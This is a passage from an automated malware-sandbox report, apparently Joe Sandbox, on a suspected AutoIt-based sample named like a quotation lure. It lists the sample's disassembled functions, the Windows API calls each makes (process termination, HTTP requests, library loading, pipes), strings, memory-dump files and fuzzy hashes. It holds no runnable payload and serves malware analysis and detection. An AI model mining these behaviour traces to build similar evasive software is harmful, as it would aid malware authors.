                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E201A6
                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E201B1
                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E201B9
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E201C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: 559457ea0a1c4adb0b58381e04bc51ca5cd8553ca50f1dd6d4907c48ce253a4e
                                                                      • Instruction ID: 37620c0a6671a5cec699ac88e052411fee0bf3f1276c3770c25fc5cdfde5b358
                                                                      • Opcode Fuzzy Hash: 559457ea0a1c4adb0b58381e04bc51ca5cd8553ca50f1dd6d4907c48ce253a4e
                                                                      • Instruction Fuzzy Hash: 7F016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BE15C87941C7F5A868CBE5
                                                                      Function 00E653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E653F9
                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E6540F
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00E6541E
                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E6542D
                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E65437
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E6543E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 839392675-0
                                                                      • Opcode ID: 6ab56f2f22217a39d91cd373cfa83795e7b7d41cbc9954615523815618b6515c
                                                                      • Instruction ID: 2a80090c245926b0a5eedaf22d153c79016223f97f31931722b5103823954e97
                                                                      • Opcode Fuzzy Hash: 6ab56f2f22217a39d91cd373cfa83795e7b7d41cbc9954615523815618b6515c
                                                                      • Instruction Fuzzy Hash: F7F06D32241558BFE3205BA39C0DEAB7A7CEFCAB11F000269FA09E1051EAA01A0597B5
                                                                      Function 00E67230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00E67243
                                                                      • EnterCriticalSection.KERNEL32(?,?,00E10EE4,?,?), ref: 00E67254
                                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00E10EE4,?,?), ref: 00E67261
                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E10EE4,?,?), ref: 00E6726E
                                                                        • Part of subcall function 00E66C35: CloseHandle.KERNEL32(00000000,?,00E6727B,?,00E10EE4,?,?), ref: 00E66C3F
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E67281
                                                                      • LeaveCriticalSection.KERNEL32(?,?,00E10EE4,?,?), ref: 00E67288
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3495660284-0
                                                                      • Opcode ID: 8a8951fc3f05f058a8a8b56555ab05abe2e9e4cfd886d247e0f9178ad2d13690
                                                                      • Instruction ID: 568ff789e9dbf2684c05766fc0ad8cb53dfdc57e4cfbe15036995c8e9a4f9a72
                                                                      • Opcode Fuzzy Hash: 8a8951fc3f05f058a8a8b56555ab05abe2e9e4cfd886d247e0f9178ad2d13690
                                                                      • Instruction Fuzzy Hash: 45F0BE36480602EFD7111BA4EC4C9DB7729EF04312B100131F107B00B0CB7A5818CB50
                                                                      Function 00E58992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E5899D
                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00E589A9
                                                                      • CloseHandle.KERNEL32(?), ref: 00E589B2
                                                                      • CloseHandle.KERNEL32(?), ref: 00E589BA
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00E589C3
                                                                      • HeapFree.KERNEL32(00000000), ref: 00E589CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: 6652bd9b19f8a72426b3e195c597f5b9e8190748296d57d689ec8977b1d0c289
                                                                      • Instruction ID: 4f38d140f51314c040ab9ea8713d28c79b8c98bc657e8ccc59a5474d20c28a84
                                                                      • Opcode Fuzzy Hash: 6652bd9b19f8a72426b3e195c597f5b9e8190748296d57d689ec8977b1d0c289
                                                                      • Instruction Fuzzy Hash: B1E0C236004001FFDA011FE2EC0C90ABB69FB89322B108231F219E1075CB329428DB50
                                                                      Function 00E57530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E576EA
                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E57702
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00E8FB80,000000FF,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E57727
                                                                      • _memcmp.LIBCMT ref: 00E57748
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                      • String ID: ,,
                                                                      • API String ID: 314563124-1556401989
                                                                      • Opcode ID: 1a23ea9f86bcde46a24f37ff1051b410e6c2b16beb8e0bfc3cf1fb347a81e2d2
                                                                      • Instruction ID: c6a084e412996204d473d8448844a35cd25c15a482fa526c6018a00c7cb54ce6
                                                                      • Opcode Fuzzy Hash: 1a23ea9f86bcde46a24f37ff1051b410e6c2b16beb8e0bfc3cf1fb347a81e2d2
                                                                      • Instruction Fuzzy Hash: B0812C71A00109EFCB04DFA4D984DEEB7B9FF89316F204559E945BB250DB71AE0ACB60
                                                                      Function 00E785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00E78613
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00E78722
                                                                      • VariantClear.OLEAUT32(?), ref: 00E7889A
                                                                        • Part of subcall function 00E67562: VariantInit.OLEAUT32(00000000), ref: 00E675A2
                                                                        • Part of subcall function 00E67562: VariantCopy.OLEAUT32(00000000,?), ref: 00E675AB
                                                                        • Part of subcall function 00E67562: VariantClear.OLEAUT32(00000000), ref: 00E675B7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                      • API String ID: 4237274167-1221869570
                                                                      • Opcode ID: a6d875a7c7e7dad78fea6ed1815237edbe2b8612c30760a01aa4685854fda843
                                                                      • Instruction ID: 54fce3695513c92ba8d57931cb98f424b0f8b9898a8e8e85ac013fd8aa55b383
                                                                      • Opcode Fuzzy Hash: a6d875a7c7e7dad78fea6ed1815237edbe2b8612c30760a01aa4685854fda843
                                                                      • Instruction Fuzzy Hash: EC91AE716043019FCB04DF24C58495BBBE4EF99314F14992EF89AEB3A2DB30E945CB92
                                                                      Function 00E62A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E1FC86: _wcscpy.LIBCMT ref: 00E1FCA9
                                                                      • _memset.LIBCMT ref: 00E62B87
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E62BB6
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E62C69
                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E62C97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                      • String ID: 0
                                                                      • API String ID: 4152858687-4108050209
                                                                      • Opcode ID: 18b1f1622ef2478c1ebe330b6ca17f63df0a1cbdf97ecafe2fa4e5d632874aab
                                                                      • Instruction ID: 851a3cb442ed8908c1fc4fa27fe538757e7e415a8478144437734647333b7253
                                                                      • Opcode Fuzzy Hash: 18b1f1622ef2478c1ebe330b6ca17f63df0a1cbdf97ecafe2fa4e5d632874aab
                                                                      • Instruction Fuzzy Hash: 2651FF71248B009EC7249F28E845A6FB7E8EF94398F042A2DFA94F61D1DB70CC44C792
                                                                      Function 00E13137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_free
                                                                      • String ID: 3c$_
                                                                      • API String ID: 2620147621-4099079164
                                                                      • Opcode ID: 6fcf425260ef571b45fccc345fd595930c12a0b738c5f40ad79598b3ddeb791b
                                                                      • Instruction ID: 51bdcff3ff12a974b8081fc9daa03e90854b5b8cc33cff20138bb1ea5fbb9e23
                                                                      • Opcode Fuzzy Hash: 6fcf425260ef571b45fccc345fd595930c12a0b738c5f40ad79598b3ddeb791b
                                                                      • Instruction Fuzzy Hash: 89517A71A043418FDB25CF28D480BAEBBE5FF89314F44582DE999A7351DB31E941CB82
                                                                      Function 00E16192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$_memmove
                                                                      • String ID: 3c$ERCP
                                                                      • API String ID: 2532777613-1756721700
                                                                      • Opcode ID: 43edea1557df9b1c41455973bc1c7cfb4244561b372d3be6b42b4d9460be6e31
                                                                      • Instruction ID: 5ff9e201c49e1aef71b2aba738efa6f1878a88e86192ed7e8d6db177ff64a174
                                                                      • Opcode Fuzzy Hash: 43edea1557df9b1c41455973bc1c7cfb4244561b372d3be6b42b4d9460be6e31
                                                                      • Instruction Fuzzy Hash: 9F51AF71A00705DBDB24CF65C9817EAB7F4EF44308F20596EE94AEB291E770AA84CB40
                                                                      Function 00E62753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E627C0
                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E627DC
                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00E62822
                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EC5890,00000000), ref: 00E6286B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                      • String ID: 0
                                                                      • API String ID: 1173514356-4108050209
                                                                      • Opcode ID: 7c20815738d2c8d5dd1cf5a45031ec74d64ddbda71b5ebf33814cffb1407b421
                                                                      • Instruction ID: 5bf29ed5aa1e3c9345bff996b870c9296ba5723d84a39298e7fa95b2e3a29e7c
                                                                      • Opcode Fuzzy Hash: 7c20815738d2c8d5dd1cf5a45031ec74d64ddbda71b5ebf33814cffb1407b421
                                                                      • Instruction Fuzzy Hash: 5D41C0706447019FD724DF28EC44B5ABBE4EF85354F04492DFAA5A72D2D730A805CB62
                                                                      Function 00E7D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E7D7C5
                                                                        • Part of subcall function 00E0784B: _memmove.LIBCMT ref: 00E07899
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharLower_memmove
                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                      • API String ID: 3425801089-567219261
                                                                      • Opcode ID: bb698277f97271238c6e62596b49a10849efcc086b6f71b8c99d4f2a35de646b
                                                                      • Instruction ID: 885eb143d7c04484dec5473b7d87b942dba058cb9ec74f30bc0536abff3418c6
                                                                      • Opcode Fuzzy Hash: bb698277f97271238c6e62596b49a10849efcc086b6f71b8c99d4f2a35de646b
                                                                      • Instruction Fuzzy Hash: 1131AF71908619AFDF04EF54CC919EEB3F4FF44324B10A629E869B76D2DB31A945CB80
                                                                      Function 00E58E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC
                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E58F14
                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E58F27
                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E58F57
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_memmove$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 365058703-1403004172
                                                                      • Opcode ID: 5b367c63412eeede1784f42a2496ad4288d83bf640c4bdf3519f73bb7920b8d1
                                                                      • Instruction ID: 78f205381124b11ac318bc0a88a0a0f67ee51993ecfa20e2f21386a3717b41f4
                                                                      • Opcode Fuzzy Hash: 5b367c63412eeede1784f42a2496ad4288d83bf640c4bdf3519f73bb7920b8d1
                                                                      • Instruction Fuzzy Hash: D1210471A00108BEDB14ABB0DC45CFFB7A9DF45360B146A29F865B71E1DF39184DDA60
                                                                      Function 00E7182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E7184C
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E71872
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E718A2
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00E718E9
                                                                        • Part of subcall function 00E72483: GetLastError.KERNEL32(?,?,00E71817,00000000,00000000,00000001), ref: 00E72498
                                                                        • Part of subcall function 00E72483: SetEvent.KERNEL32(?,?,00E71817,00000000,00000000,00000001), ref: 00E724AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: 55c7d80fb4589e4d4c75f9c667777e037cb269f40852ee64334a725d976f48c6
                                                                      • Instruction ID: 56c42544eb0b38a5b4bc35fd0e059f88a072ffa5f0f12ace6da841bfdba2bd90
                                                                      • Opcode Fuzzy Hash: 55c7d80fb4589e4d4c75f9c667777e037cb269f40852ee64334a725d976f48c6
                                                                      • Instruction Fuzzy Hash: 1921B0B1500308BFFB119F69DC85EBB77EDEB48748F10916AF549B2140EA258D0557A1
                                                                      Function 00E863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
                                                                        • Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
                                                                        • Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91
                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E86461
                                                                      • LoadLibraryW.KERNEL32(?), ref: 00E86468
                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E8647D
                                                                      • DestroyWindow.USER32(?), ref: 00E86485
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 4146253029-1011021900
                                                                      • Opcode ID: 1d23a9cc71517bf059273e913b70c8f93990e47bdde86a1feb8b62dc752aae3b
                                                                      • Instruction ID: 78135c12e7bcfab3d5755f09de77307042c7b88b21278778ff3332eb23dbcd2e
                                                                      • Opcode Fuzzy Hash: 1d23a9cc71517bf059273e913b70c8f93990e47bdde86a1feb8b62dc752aae3b
                                                                      • Instruction Fuzzy Hash: 5A215E71110205AFEF106F64DC80EBF77A9FB59368F206629FA2CB61A0D7719C91A760
                                                                      Function 00E66D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00E66DBC
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E66DEF
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00E66E01
                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E66E3B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
